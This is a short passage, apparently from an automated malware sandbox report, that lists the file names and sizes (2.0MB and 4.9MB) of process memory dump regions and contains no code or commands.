                                                                                                                                                                      2.0MB

                                                                                                                                                                    • memory/4956-2-0x00007FF7306B0000-0x00007FF7308BB000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      2.0MB

                                                                                                                                                                    • memory/5020-171-0x0000000000FD0000-0x00000000014B8000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      4.9MB